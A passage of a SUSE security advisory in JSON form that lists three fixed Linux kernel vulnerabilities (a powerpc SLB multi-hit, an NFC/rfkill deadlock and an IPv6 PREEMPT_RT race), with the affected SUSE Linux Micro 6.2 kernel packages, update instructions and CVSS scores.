"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71080",
"url": "https://www.suse.com/security/cve/CVE-2025-71080"
},
{
"category": "external",
"summary": "SUSE Bug 1256608 for CVE-2025-71080",
"url": "https://bugzilla.suse.com/1256608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
